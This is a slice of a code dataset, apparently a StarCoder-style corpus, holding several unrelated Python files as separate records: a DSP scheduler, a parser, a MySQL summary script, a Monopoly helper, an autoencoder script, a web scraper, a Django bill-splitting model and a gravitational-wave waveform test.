= nodeCodeID + 1\n # Constant nodes are ignored since they have\n # no arcs, and are connected to no FIFOs\n theArgs=[] \n theArgTypes=[]\n i,o=n.allIOs()\n for io in i:\n # An io connected to a constant node has no fifo \n if not io.fifo is None:\n theArgs.append(self.fifoID(io.fifo))\n 
theArgTypes.append(io.ctype)\n else:\n # Instead the arg is the name of a constant node\n # instead of being a fifo ID\n theArgs.append(io.constantNode.name)\n theArgTypes.append(io.constantNode.name)\n for io in o:\n theArgs.append(self.fifoID(io.fifo))\n theArgTypes.append(io.ctype)\n n.args=theArgs\n\n # Analyze the nature of arguments for pure functions\n # The information created during this analysis\n # is useful when generating a class containing the\n # pure function\n if not n.hasState:\n theType=(n.nodeName,tuple(theArgTypes))\n if not theType in self._pureNodes:\n self._pureNodes[theType]=n\n n.pureClassID = pureClassID \n pureClassID = pureClassID + 1\n else:\n n.pureClassID = self._pureNodes[theType].pureClassID\n n.pureNodeType=theType\n n.analyzeArgs()\n\n def hasDelay(self,edge):\n return(self._graph.hasDelay(edge))\n\n def getDelay(self,edge):\n return(self._graph.getDelay(edge))\n\n @property\n def pureNodes(self):\n return self._pureNodes\n \n\n @property\n def constantEdges(self):\n return self._graph.constantEdges\n\n @property\n def nodes(self):\n return self._sortedNodes\n\n @property\n def edges(self):\n return self._sortedEdges\n\n @property\n def schedule(self):\n return self._schedule\n\n #@property\n #def fifoLengths(self):\n # return self._fifos\n\n @property \n def scheduleLength(self):\n return len(self.schedule)\n\n @property \n def memory(self):\n #theBytes=[x[0].theType.bytes for x in self.edges]\n #theSizes=[x[0]*x[1] for x in zip(self.fifoLengths,theBytes)]\n #return(np.sum(theSizes))\n return(self._graph._totalMemory)\n\n @property\n def graph(self):\n return self._graph\n\n def fifoID(self,edge):\n return(self.edges.index(edge))\n\n def outputFIFOs(self,node):\n outs=[]\n for io in node.outputNames:\n x = node._outputs[io]\n fifo=(self.fifoID(x.fifo),io)\n outs.append(fifo)\n \n return(outs)\n\n def ccode(self,directory,config=Configuration()):\n \"\"\"Write graphviz into file f\"\"\" \n 
cmsisdsp.sdf.scheduler.ccode.gencode(self,directory,config)\n\n def pythoncode(self,directory,config=Configuration()):\n \"\"\"Write graphviz into file f\"\"\" \n cmsisdsp.sdf.scheduler.pythoncode.gencode(self,directory,config)\n\n def graphviz(self,f,config=Configuration()):\n \"\"\"Write graphviz into file f\"\"\" \n cmsisdsp.sdf.scheduler.graphviz.gengraph(self,f,config)\n \n \n \n ","sub_path":"CMSIS/DSP/cmsisdsp/sdf/scheduler/description.py","file_name":"description.py","file_ext":"py","file_size_in_byte":22386,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"125942032","text":"from pygadgetreader import *\nimport numpy as np\n\nimport sys\nsys.path.insert(0, '/home/hungjinh/Research/baryon_proj/code')\nfrom cal_Pk_tool_MBII import *\n\n\n\ntemp_save_dir=\"/home/hungjinh/Research/baryon_proj/code/temp_storage/MBII_baryon_MassCube1024/\"\n\nbasePath= '/physics/nkhandai/mb2/snapdir/'\n\nsnap=85\nNsubfiles=1024\nboxsize=100. # comoving Mpc/h\nresol = 1024\nVbox=boxsize**3\n\n\ngas_mass_cube =build_mass_cube(snap,basePath,'gas',boxsize,resol,Nsubfiles)\n\nnp.save(temp_save_dir+\"MBII_baryon_MassCube1024_gas.npy\", gas_mass_cube)","sub_path":"large_job/old_code/gen_mass_cube_MBII_baryon_gas.py","file_name":"gen_mass_cube_MBII_baryon_gas.py","file_ext":"py","file_size_in_byte":532,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"341373109","text":"class ShiftReduceParser:\n SHIFT = 'SHIFT'\n REDUCE = 'REDUCE'\n OK = 'OK'\n \n def __init__(self, G, verbose=False):\n self.G = G\n self.verbose = verbose\n self.action = {}\n self.goto = {}\n self._build_parsing_table()\n \n def _build_parsing_table(self):\n raise NotImplementedError()\n\n def __call__(self, w):\n stack = [ 0 ] #S \n cursor = 0\n output = []\n operations = []\n \n while True:\n state = stack[-1]\n lookahead = w[cursor].token_type\n if self.verbose: print(stack, '<---||--->', w[cursor:])\n 
try:\n action, tag = self.action[state, lookahead]\n if action == self.SHIFT:\n operations.append(\"SHIFT\")\n stack.append(tag)\n cursor += 1\n elif action == self.REDUCE:\n operations.append(\"REDUCE\")\n l = len(tag.Right)\n while l > 0:\n stack.pop()\n l -= 1\n output.append(tag)\n last = stack[-1]\n stack.append(self.goto[last, tag.Left])\n elif action == self.OK:\n return output, operations, True\n else:\n return \"Error! Action Table Conflict\", operations, False\n except KeyError:\n s = pprint_w(w[:(cursor + 1)])\n #print(\"Lookahead\", lookahead)\n return f\"Error! String does not match Grammars generated language: \\n {s}\", operations, False\n\n @staticmethod\n def _register(table, key, value, conflict_type: dict):\n if key in table and table[key] != value:\n if table[key][0] == 'SHIFT' and value[0] == 'REDUCE' or table[key][0] == 'REDUCE' and value[0] == 'SHIFT':\n conflict_type[key] = \"SHIFT-REDUCE\"\n\n elif table[key][0] == value[0] == 'REDUCE':\n conflict_type[key] = \"REDUCE-REDUCE\"\n\n else: conflict_type[key] = \"Fuiste Engannado\"\n #assert key not in table or table[key] == value, 'Shift-Reduce or Reduce-Reduce conflict!!!'\n else: \n table[key] = value\n\ndef conflict_chain(p):\n q = [(0, [0], \"\")]\n visited = set()\n while len(q) > 0: \n state, s_state, chain = q.pop()\n for t in p.G.terminals + [p.G.EOF]:\n s_copy = s_state.copy()\n chain += str(t)\n if (state, t) in p.conflictType:\n print(\"Conflictt\")\n return chain, p.conflictType[state, t]\n try:\n action, tag = p.action[state, t]\n except KeyError: continue\n\n new_state = None\n if action == p.SHIFT:\n new_state = tag\n elif action == p.REDUCE:\n l = len(tag.Right)\n while l > 0:\n s_copy.pop()\n l -= 1\n last = s_copy[-1]\n new_state = p.goto[last, tag.Left]\n elif action == p.OK: continue\n else: return \"\", \"\"\n if new_state not in visited:\n s_copy.append(new_state)\n q.append((new_state, s_copy, chain))\n visited.add(new_state)\n return \"\", \"\"\n\ndef 
pprint_w(tokens):\n indent = 0\n pending = []\n s = \"\"\n for token in tokens:\n pending.append(token.lex)\n if token.lex in { \"{\", \"}\", \";\" }:\n if token.lex == \"}\":\n indent -= 1\n s += (' '*indent + ' '.join(str(t) for t in pending))\n s += \"\\n\"\n pending.clear()\n if token.lex == \"{\":\n indent += 1\n s += (' '.join([str(t) for t in pending]))\n return s","sub_path":"cmp/tools/shift_reduce_parser.py","file_name":"shift_reduce_parser.py","file_ext":"py","file_size_in_byte":3821,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"456182488","text":"#/usr/bin/python3\nimport pymysql\nimport datetime\nimport sys\n\nred = \"\\033[1;38m\"\ngreen = \"\\033[1;32m\"\nend = \"\\033[1;m\"\n\n\nbikes = [\"0587\",\"0603\",\"0636\",\"0657\",\"0665\",\"0669\",\"1210\",\"1473\",\"2910\",\"3014\",\"3215\",\"3410\",\"3469\",\"4381\",\"5233\",\"5432\",\"6089\",\"6097\",\"6473\",\"6904\",\"6994\",\"7303\",\"7459\",\"7517\",\"7710\",\"8508\",\"8664\",\"8870\",\"9050\",\"9407\",\"9519\"]\n\ntoday = datetime.datetime.now()\nif(len(sys.argv) == 1):\n time1 = \"2015-05-00 00:00:00\"\n time2 = str(today.year) + \"-\" + str(today.month) + \"-\" + str(today.day) + \" 00:00:00\"\nelif(len(sys.argv) == 2):\n time1 = sys.argv[1][0:4] + \"-\" + sys.argv[1][4:6] + \"-00 00:00:00\"\n time2 = str(today.year) + \"-\" + str(today.month) + \"-\" + str(today.day) + \" 00:00:00\"\nelse:\n time1 = sys.argv[1][0:4] + \"-\" + sys.argv[1][4:6] + \"-00 00:00:00\"\n time2 = sys.argv[2][0:4] + \"-\" + sys.argv[2][4:6] + \"-31 23:59:59\"\n\n\n\nexe = \"SELECT imei, minute, sum(v) as v,count(v) as total, sum(v)/count(v) as percent FROM (SELECT imei,id,minute, (total_valid_reading > 0) as v FROM per_trip_each_minute_quality WHERE start_time BETWEEN '\"+ time1 + \"' AND '\"+ time2 + \"' group by imei,id,minute) as sub group by imei,minute\"\nconnection = pymysql.connect(host='hostname',\n user='user',\n passwd='passwd',\n db='db')\ncur = 
connection.cursor()\ncur.execute(exe)\nreadings = cur.fetchall()\nbikes_quality = {}\nfor bike in bikes:\n bikes_quality[str(int(bike))] = {}\n\nfor reading in readings:\n bikes_quality[reading[0]][reading[1]] = str(reading[4])\n\nbikes_array = []\nfor key, value in bikes_quality.items():\n arr = [];\n for minite in value:\n arr.append(value[minite]);\n bikes_array.append({\n \"IMEI\" : key,\n \"quality\":arr\n })\n\nprint(\"bikes_data = %s\" % (bikes_array))\n\nconnection.close()\n","sub_path":"scripts/perbikepertrip_summary/trip_summary.py","file_name":"trip_summary.py","file_ext":"py","file_size_in_byte":1832,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"521414690","text":"#Work in progress, meant to be used with Spyder IPython console\r\nimport random\r\nimport matplotlib.pyplot as plt\r\n\r\ndef round4(x):\r\n return round(float(x)+0.00000000001,4)\r\n\r\ndef getLocation(location):\r\n options = {0 : 'go',\r\n 1: 'community chest',\r\n 2: 'baltic',\r\n 3: 'income tax',\r\n 4: 'reading railroad',\r\n 5: 'oriental',\r\n 6: 'chance',\r\n 7: 'vermont',\r\n 8: 'connecticut',\r\n 9: 'jail',\r\n 10: 'st charles',\r\n 11: 'electric company',\r\n 12: 'states',\r\n 13: 'virginia',\r\n 14: 'pennsylvania railroad',\r\n 15: 'st james',\r\n 16: 'community chest',\r\n 17: 'tennessee',\r\n 18: 'new york',\r\n 19: 'free parking',\r\n 20: 'kentucky',\r\n 21: 'chance',\r\n 22: 'indiana',\r\n 23: 'illonois',\r\n 24: 'b and o railroad',\r\n 25: 'atlantic',\r\n 26: 'venitor',\r\n 27: 'water works',\r\n 28: 'marvin gardens',\r\n 29: 'go to jail',\r\n 30: 'pacific',\r\n 31: 'north carolina',\r\n 32: 'community chest',\r\n 33: 'pennsylvania',\r\n 34: 'short line',\r\n 35: 'chance',\r\n 36: 'park place',\r\n 37: 'luxury tax',\r\n 38: 'boardwalk',\r\n }\r\n\r\n\r\n\r\ndef drawDistribution(X, P, title, CDF = False):\r\n bins = [n - .5 for n in X]\r\n bins.append(max(X) + .5)\r\n plt.figure(figsize = (10,5))\r\n if not CDF:\r\n 
(a,b,y) = plt.hist(X, bins, weights = P, normed = True)\r\n plt.title(title + \" (PMF)\")\r\n plt.xlabel(\"Outcomes\")\r\n\r\n elif CDF:\r\n (a,b,y) = plt.hist(X, bins, weights = P, cumulative = True)\r\n plt.xlabel(\"Cumulative Distribution\")\r\n plt.title(title + \" (CDF)\")\r\n plt.ylabel(\"Probability\")\r\n plt.show()\r\n \r\ndef seeDiceProbability():\r\n X = [a for a in range(2,13)]\r\n P = [0.0279, 0.0557, 0.0833, 0.111, 0.1383, 0.1667, 0.1391, 0.1109, 0.0835, 0.0557, 0.0278]\r\n \r\n drawDistribution(X,P, 'Probability of Dice Rolls')\r\n \r\ndef simulateDice(n):\r\n results = [0] * 11\r\n for x in range(n):\r\n result = random.randint(1,6) + random.randint(1,6)\r\n results[result - 2] += 1\r\n print('dice roll results: ' )\r\n print(results)\r\n prob = [0.0] * 11\r\n for x in range(len(results)):\r\n prob[x] = round4(results[x] / n)\r\n print('dice roll probabilities:')\r\n print(prob)\r\n X = [a for a in range(2,13)]\r\n P = prob\r\n drawDistribution(X, prob, 'Probability of Dice Rolls')\r\n \r\nclass Property:\r\n def __init__(self, title, color, price, status):\r\n #if status == False, property is unowned\r\n self.title = title\r\n self.color = color\r\n self.price = price\r\n self.status = False\r\n \r\n def __repr__(self):\r\n s = self.title + ': ' + str(self.color) + ' property. 
Costs ' + str(self.price) + ' dollars'\r\n return s\r\n\r\nclass Player:\r\n def __init__(self, name, location, money):\r\n self.name = name\r\n self.location = location\r\n self.money = money\r\n \r\n def __repr__(self):\r\n s = self.name + ' is at ' + getLocation(self.location) + ' and has ' + str(self.money) + ' dollars.'\r\n if (self.name == 'you'):\r\n s = self.name + ' are at ' + getLocation(self.location) + ' and have ' + str(self.money) + ' dollars.'\r\n return s\r\n\r\n \r\n \r\ndef locationStats(Player):\r\n \r\n print(Player.name + ' is currently at ' + getLocation(Player.location))\r\n print(Player.name + ' has a 17% chance of landing on ' + getLocation(Player.location + 6))\r\n print(Player.name + ' has a 14% chance of landing on ' + getLocation(Player.location + 5))\r\n print(Player.name + ' has a 14% chance of landing on ' + getLocation(Player.location + 7))\r\n print(Player.name + ' has an 11% chance of landing on ' + getLocation(Player.location + 8))\r\n \r\n \r\ndef main():\r\n name = input('Input player name: ')\r\n money = input('How much money does ' + name + ' have? ')\r\n location = 0\r\n player = Player(name, location, money)\r\n print()\r\n while(True):\r\n print(player)\r\n print()\r\n print('Enter 1 to see what spot you will most likely land on')\r\n print('Enter 2 to display the Probability Mass Function of each dice roll')\r\n print('Enter 3 when you are ready to roll')\r\n print('Enter 4 to simulate a dice roll')\r\n print('Enter q to quit')\r\n print()\r\n decision = input('What would you like to do? ')\r\n print()\r\n if decision == '1':\r\n print()\r\n locationStats(player)\r\n print()\r\n elif decision == '2':\r\n seeDiceProbability()\r\n elif decision == '3':\r\n result = input('What was the result? 
')\r\n player.location += int(result) - 1\r\n\r\n \r\n elif decision == '4':\r\n roll = random.randint(1,6) + random.randint(1,6)\r\n if roll == 11 or roll == 8:\r\n print('You rolled an ' + str(roll))\r\n else:\r\n print('You rolled a '+ str(roll))\r\n print()\r\n elif decision == 'q':\r\n print('Quitting!')\r\n break\r\n else:\r\n print('Decision not recognized')\r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n ","sub_path":"monopolyConsulting.py","file_name":"monopolyConsulting.py","file_ext":"py","file_size_in_byte":5846,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"299891177","text":"#-------------------------------Resize-------------------------------\nimport os\nimport numpy as np\nfrom PIL import Image\nimport tensorflow as tf\n# from tensorflow import keras\nfrom tensorflow.keras import backend as k\n\nfrom tensorflow.keras.models import Sequential, load_model\n# from tensorflow.keras import backend\n\n\n#AttributeError: ‘_thread._local’ object has no attribute ‘value’の解決策以下\n# import keras.backend.tensorflow_backend as tb\n# tb._SYMBOLIC_SCOPE.value = True\n#-------------------------------学習modelのロード-------------------------------\n# model and backend graph must be created on global\n\n#AttributeError: ‘_thread._local’ object has no attribute ‘value’の解決策以下\nimport tensorflow as tf\n# sess = tf.compat.v1.Session(graph=tf.import_graph_def(), config=session_conf)\n# sess = tf.compat.v1.Session(graph=tf.compat.v1.get_default_graph(), config=session_conf)\n\n# tf.compat.v1.keras.backend.set_session(sess)\n\nglobal model, graph\nk.clear_session()\n\ndef autoencoder_model(encoder, decoder):\n model = Sequential()\n model.add(encoder)\n model.add(decoder)\n return model\n#学習済みモデルの読込モデルを実行したいだけであれば、compile=False\nencoder=load_model('py/AE_para/encoder_250.h5', compile=False)\ndecoder=load_model('py/AE_para/decoder_250.h5', compile=False)\nautoencoder = 
autoencoder_model(encoder, decoder)\nautoencoder.summary()\n# graph = tf.get_default_graph()\n\ninput_dir = 'py/output/'\npred_dir = 'py/pred/'\n\ndef gan_image(img_name):\n file_name = input_dir + img_name + '.JPG'\n img = Image.open(file_name).convert(\"RGB\"); img.close\n img = np.array(img)\n img = (img - 127.5) / 127.5\n img = img[np.newaxis, ...]\n pred = autoencoder.predict(img)\n pred = np.squeeze(pred)\n # with graph.as_default(): # use the global graph\n # pred = autoencoder.predict(img)\n img = Image.fromarray(np.uint8(pred * 127.5 + 127.5))\n file_name = pred_dir + img_name + '.JPG' \n img.save(file_name)\n print('finidh gan')","sub_path":"camerav5_realtime/py/gan.py","file_name":"gan.py","file_ext":"py","file_size_in_byte":2037,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"619957891","text":"import re\nimport urllib\nfrom BeautifulSoup import *\n\n# open the \"ausurls.txt\" in the reading mode\nurlhand = open('aus_urls.txt', 'r')\ndata = urlhand.read()\nlst = data.rsplit(',,')\n\n# remove empty elements\nwhile lst.count(\"\") > 0:\n lst.remove(\"\")\n\n# extract unique elements in the list\nlst = list(set(lst))\n \n# open the \"aus_rawtext2.txt\" in the writing mode\nrawhand = open('aus_rawtext2.txt', 'w')\n\nfor url in lst:\n url = str(url.strip())\n html = urllib.urlopen(url).read()\n soup = BeautifulSoup(html)\n tags = soup.findAll('p')\n for line in tags:\n rawhand.write(str(line) + '. \\n')\n \nurlhand.close()\nrawhand.close()","sub_path":"aus_rawtext2.py","file_name":"aus_rawtext2.py","file_ext":"py","file_size_in_byte":646,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"518847339","text":"import decimal\n\nfrom django.db import models\nfrom django.utils import timezone\n\n\ndef convert_decimal_dollars_to_cents(dec):\n \"\"\"Convert a decimal dollar amount to total cents representation. 
Now handles negative values as well.\n\n '12.50' -> ['12', '25'] -> [12, 25] -> 12 * 100 + 25 => 1250\n '12.5' -> ['12', '5'] -> [12, 50] -> 12 * 100 + 50 => 1250\n '12.05' -> ['12', '05'] -> [12, 5] -> 12 * 100 + 5 => 1205\n '12' -> ['12'] -> [12] -> 12 * 100 + 0 => 1200\n\n :param dec: decimal.Decimal type ('123.23', '23', '0.45', etc.)\n :return: total cents (dollars * 100 + cents)\n \"\"\"\n dec_str = str(dec)\n dec_parts = dec_str.split('.')\n\n # Always at least length 1, so dollars always represented\n input_dollars = dec_parts[0]\n negative = 1 # Whether the value is negative or not (toggle by multiplying +1 or -1)\n\n if input_dollars: # Without decimal.Decimal, could get .25 -> '', '25'\n if input_dollars[0] == '-': # Handle negative amounts\n negative = -1 # Remember negative\n input_dollars = input_dollars[1:]\n dollar_cents = int(input_dollars) * 100\n else:\n dollar_cents = 0\n\n if len(dec_parts) > 1: # Dollars and Cents\n input_cents = dec_parts[1]\n if input_cents: # Without decimal, could get 5. 
-> '5', ''\n if len(input_cents) == 1:\n input_cents += '0' # Pad ending 0: 1.5 -> ['1', '5'] ==> 5 --> 50\n cent_cents = int(input_cents)\n else: # '' -> 0\n cent_cents = 0\n else: # Cents weren't entered\n cent_cents = 0\n total_cents = (dollar_cents + cent_cents) * negative # (toggle by multiplying +1 or -1)\n return total_cents\n\n\ndef format_cents_to_currency_text(all_cents):\n \"\"\"Format an entire amount represented by cents to a dollar.cents unicode string\n\n :param all_cents: Amount in cents (positive, negative, or 0)\n :return: Unicode\n \"\"\"\n if all_cents < 0: # Handle negative totals\n negative = True # Will Owe\n else:\n negative = False # Owed\n all_cents = abs(all_cents) # Division, Modulus done with positive number only\n dollars = all_cents / 100\n cents = all_cents % 100\n if negative: # Adjust for negative\n return u\"-{}.{:02d}\".format(dollars, cents)\n else:\n return u\"{}.{:02d}\".format(dollars, cents)\n\n\nclass MonthlyBill(models.Model):\n # Name of the Month Bill\n name = models.CharField(max_length=50, blank=False, default=u'New Bill')\n # Biller calculating the split\n biller = models.CharField(max_length=50, blank=False, default=u'Kendal')\n billee = models.CharField(max_length=50, blank=False, default=u'Shay')\n\n date_calculated = models.DateTimeField(auto_now_add=True, default=timezone.now)\n date_recalculated = models.DateTimeField(auto_now=True, default=timezone.now)\n\n # Parts of the Rent to be Paid By Each party\n biller_rent = models.DecimalField(max_digits=6, decimal_places=2, default=decimal.Decimal('455.00'),\n verbose_name=u'Biller Rent Half') # This is the amount the Biller is paying\n other_rent = models.DecimalField(max_digits=6, decimal_places=2, default=decimal.Decimal('580.00'),\n verbose_name=u'Other Rent Half') # This is the amount the Billee is paying\n\n # Halfable amounts\n electricity = models.DecimalField(max_digits=6, decimal_places=2, blank=True, default=decimal.Decimal('0.00'))\n water = 
models.DecimalField(max_digits=6, decimal_places=2, blank=True, default=decimal.Decimal('0.00'))\n cable = models.DecimalField(max_digits=6, decimal_places=2, blank=True, default=decimal.Decimal('0.00'))\n other = models.DecimalField(max_digits=6, decimal_places=2, blank=True, default=decimal.Decimal('0.00'))\n\n # Non halfable amounts\n additional = models.DecimalField(max_digits=6, decimal_places=2, blank=True, default=decimal.Decimal('0.00'))\n discount = models.DecimalField(max_digits=6, decimal_places=2, blank=True, default=decimal.Decimal('0.00'))\n\n biller_amount_due = models.CharField(max_length=20, default=\"0.00\")\n other_amount_due = models.CharField(max_length=20, default=\"0.00\")\n\n notes = models.TextField(blank=True)\n\n def save(self, *args, **kwargs):\n # Calculate and set biller and other due\n self._set_amounts_due()\n # Then save as normal\n super(MonthlyBill, self).save(*args, **kwargs)\n\n def _set_amounts_due(self):\n # Each party pays the half amount\n half_amount_cents = self._calculate_half_amount_cents()\n self._set_biller_due(half_amount_cents)\n self._set_other_due(half_amount_cents)\n\n def get_halfable_total(self):\n half_total_cents = self._calculate_half_amount_cents()\n return format_cents_to_currency_text(half_total_cents)\n\n def get_additional_amount(self):\n additional_cents = convert_decimal_dollars_to_cents(self.additional)\n return format_cents_to_currency_text(additional_cents)\n\n def get_discount_amount(self):\n discount_cents = convert_decimal_dollars_to_cents(self.discount)\n return format_cents_to_currency_text(discount_cents)\n\n def _set_other_due(self, half_amount_cents):\n additional_cents = convert_decimal_dollars_to_cents(self.additional)\n discount_cents = convert_decimal_dollars_to_cents(self.discount)\n # Rent + Half + Additional + Discount\n other_due_cents = self._other_rent_cents() + half_amount_cents + additional_cents - discount_cents\n self.other_amount_due = 
format_cents_to_currency_text(other_due_cents)\n\n def _set_biller_due(self, half_amount_cents):\n # Rent + Half\n biller_due_cents = self._biller_rent_cents() + half_amount_cents\n # Make sure cents always have a 0 in front for 2 decimal places\n self.biller_amount_due = format_cents_to_currency_text(biller_due_cents)\n\n def _biller_rent_cents(self):\n return convert_decimal_dollars_to_cents(self.biller_rent)\n\n def _other_rent_cents(self):\n return convert_decimal_dollars_to_cents(self.other_rent)\n\n def _calculate_half_amount_cents(self):\n \"\"\"Calculate the total half of the halfable amounts owed by each party.\n\n :return: The total half in cents\n \"\"\"\n # Get the cents amount for each halfable amount\n electric_cents = convert_decimal_dollars_to_cents(self.electricity)\n water_cents = convert_decimal_dollars_to_cents(self.water)\n cable_cents = convert_decimal_dollars_to_cents(self.cable)\n other_cents = convert_decimal_dollars_to_cents(self.other)\n # Add together all the cents amounts\n # Electricity + Water + Cable + Other\n total_cents = electric_cents + water_cents + cable_cents + other_cents\n # Half the total, done - each person owes this\n half_total_cents = total_cents // 2\n # penny_remainder = total_cents % 2 # Dropped\n return half_total_cents\n\n\n","sub_path":"MonthlySplit/biller/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":7005,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"156969351","text":"import numpy as np\nimport matplotlib.pyplot as plt\nimport lalsimulation as lalsim\nimport lal\n\nimport sys\nsys.path.insert(0,'../mlgw_v2')\nimport GW_generator as gen\nfrom GW_helper import compute_optimal_mismatch\n\nsys.path.insert(0,'./IMRPhenomTPHM')\nfrom run_IMR import *\n\ndef twist_modes(g, h_22, h_21, alpha, beta, gamma):\n\tl = 2\n\talpha, beta, gamma = alpha[None,:], beta[None,:], gamma[None,:]\n\th_P = np.zeros((1,len(h_22),4))\n\n\tm_modes_list = 
[(2,2),(2,1)]#, (2,-1), (2,-2)] #len = M'\n\n\t\t#genereting the non-precessing l-modes available\n\th_NP_l = np.column_stack([h_22, h_21, np.conj(h_21), np.conj(h_22)])[None,:] #(N,D,M'')\n\tmprime_modes_list = [(2,2),(2,1), (2,-1), (2,-2)]\n\t\n\t#h_NP_l = np.column_stack([h_22, h_21, np.conj(h_22), np.conj(h_21)])[None,:] #(N,D,M'')\n\t#mprime_modes_list = [(2,2), (2,1), (2,-2), (2,-1)]\n\t\t\t\n\tD_mmprime = g._GW_generator__get_Wigner_D_matrix(l, [lm[1] for lm in m_modes_list], [lm[1] for lm in mprime_modes_list], alpha, beta, gamma) #(N,D,M, M'')\n\t\n\t\t#putting everything together\n\th_P_l = np.einsum('ijlk,ijk->ijl', D_mmprime, h_NP_l) #(N,D,M)\n\t\n\t\t#global roation for moving everything in L0 frame\n\t#D_mmprime_L0 = g._GW_generator__get_Wigner_D_matrix(l,[lm[1] for lm in m_modes_list], [lm[1] for lm in m_modes_list], -gamma[:,0], -beta[:,0], -alpha[:,0]) #(N,M,M)\n\t#h_P_l = np.einsum('ilk,ijk -> ijl', D_mmprime_L0, h_P_l)\n\t\n\t\t#saving the results in the output matrix\n\th_P = h_P_l\n\n\treturn h_P\n\n\n#FIXME: why TEOB has such better performance in mismatches for the HMs?? 
It has a shitty ring-down!\n\n#TODO: think on how to create a dataset of angles and how to train a model for the Euler angles\n#TODO: check if you can reproduce the WF using Euler Angles in L0 frame, rather than fitting applying global transformation at the end of everything\n\t #The change of frame is done here: https://git.ligo.org/lscsoft/lalsuite/-/blob/master/lalsimulation/lib/LALSimIMRPhenomTPHM.c#L380\n#TODO: Understand the impact of alpha0 and gamma0: they seem to matter for the mismatch!\n\n\t#to create a first attempt of dataset\n#create_angles_dataset(10,20.)\n\n\ng = gen.GW_generator(3)\n#theta = np.array([[40, 20, .4, -0.1, .2, .3, -0.5, -0.1]])\ntheta = np.array([[45, 30, 0.5, -0.4 , .2, -0.2, 0.5, -0.1]])\nf_min = 20.\nt_step = 1e-4\nt_grid, alpha, beta, gamma, h_22_NP, h_21_NP, h_22, h_21, h_2m1, h_2m2 = get_IMRPhenomTPHM_modes(*theta[0,:], f_min, t_step)\nprint(\"Theta: \",theta[0,:])\n\n\t#mlgw for twisted modes\nt_mlgw = t_grid - t_grid[np.argmax(np.abs(h_22_NP))]\nh_P_mlgw_real,h_P_mlgw_imag = g.get_twisted_modes(theta, t_mlgw, [(2,2),(2,1)], f_min, None, None, False)#,res['x'])\nh_P_mlgw = h_P_mlgw_real+1j*h_P_mlgw_imag\n\n\t#NP mlgw modes\nh_NP_mlgw_real,h_NP_mlgw_imag = g.get_modes(theta[:,[0,1,4,7]], t_mlgw, [(2,2),(2,1)], out_type='realimag')\nh_NP_mlgw = h_NP_mlgw_real+1j*h_NP_mlgw_imag\n\n\t#modes twisted by mlgw\nh_P_mlgw_T = twist_modes(g, h_22_NP, h_21_NP , alpha, beta, gamma) #here mlgw performs only the twist\n\nt_grid = t_grid - t_grid[np.argmax(h_22_NP)]\n\n\t#P choose TD modes (in L0 frame)\n\t#The change of frame is performed in XLALSimIMRPhenomTPHM_L0Modes (https://git.ligo.org/lscsoft/lalsuite/-/blob/master/lalsimulation/lib/LALSimIMRPhenomTPHM.c#L328)\nhlm = 
lalsim.SimInspiralChooseTDModes(0.,\n\t\t\t\tt_step,\n\t\t\t\ttheta[0,0]*lalsim.lal.MSUN_SI,\n\t\t\t\ttheta[0,1]*lalsim.lal.MSUN_SI,\n\t\t\t\ttheta[0,2],\n\t\t\t\ttheta[0,3],\n\t\t\t\ttheta[0,4],\n\t\t\t\ttheta[0,5],\n\t\t\t\t0.,\n\t\t\t\ttheta[0,7],\n\t\t\t\tf_min,\n\t\t\t\tf_min,\n\t\t\t\t1e6*lalsim.lal.PC_SI,\n\t\t\t\tlal.CreateDict(),\n\t\t\t\t5,\t\t\t#lmax\n\t\t\t\tlalsim.IMRPhenomTPHM\n\t\t\t)\nprefactor = 4.7864188273360336e-20\nm1, m2 = theta[0,0], theta[0,1]\nnu = np.divide(m1/m2, np.square(1+m1/m2))\namp_prefactor = prefactor*(m1+m2)/1.*nu\t\t\t\nh_22_P_lal = lalsim.SphHarmTimeSeriesGetMode(hlm, 2, 2).data.data/amp_prefactor\nh_21_P_lal = lalsim.SphHarmTimeSeriesGetMode(hlm, 2, 1).data.data/amp_prefactor\nt_grid_lal = np.linspace(0, len(h_22_P_lal)*t_step, len(h_22_P_lal))\nt_grid_lal = t_grid_lal- t_grid_lal[np.argmax(h_22_P_lal)]\n\nprint(\"Mismatch NP WFs: 22, 21\", compute_optimal_mismatch(h_NP_mlgw[0,:,0], h_22_NP)[0][0], compute_optimal_mismatch(h_NP_mlgw[0,:,1], h_21_NP)[0][0])\nprint(\"Mismatch P WFs: 22, 21\", compute_optimal_mismatch(h_P_mlgw[0,:,0], h_22)[0][0], compute_optimal_mismatch(h_P_mlgw[0,:,1], h_21)[0][0])\n\n\t#plotting\n#ignoring annoying real/imag warnings in plots\nimport warnings\nwarnings.filterwarnings(\"ignore\")\n\t\nplt.figure()\nplt.title(\"angles\")\nplt.plot(t_grid, alpha, label = 'alpha')\nplt.plot(t_grid, beta, label = 'beta')\nplt.plot(t_grid, gamma, label = 'gamma')\nplt.legend()\n\t\nfig, ax = plt.subplots(2,1)\nax[0].set_title(\"22 NP\")\nax[0].plot(t_grid, h_NP_mlgw[0,:,0], label = 'mlgw NP')\nax[0].plot(t_grid, h_22_NP, label = 'IMR NP')\n#ax[0].plot(t_grid, h_22, label = 'IMR P')\nax[1].set_title(\"21 NP\")\nax[1].plot(t_grid, h_NP_mlgw[0,:,1], label = 'mlgw NP')\nax[1].plot(t_grid, h_21_NP, label = 'IMR NP')\n#ax[1].plot(t_grid, h_21, label = 'IMR P')\nax[1].legend()\nfig.tight_layout()\n\nfig, ax = plt.subplots(2,1)\nax[0].set_title(\"22 P\")\nax[0].plot(t_grid, h_P_mlgw[0,:,0], label = 'mlgw 
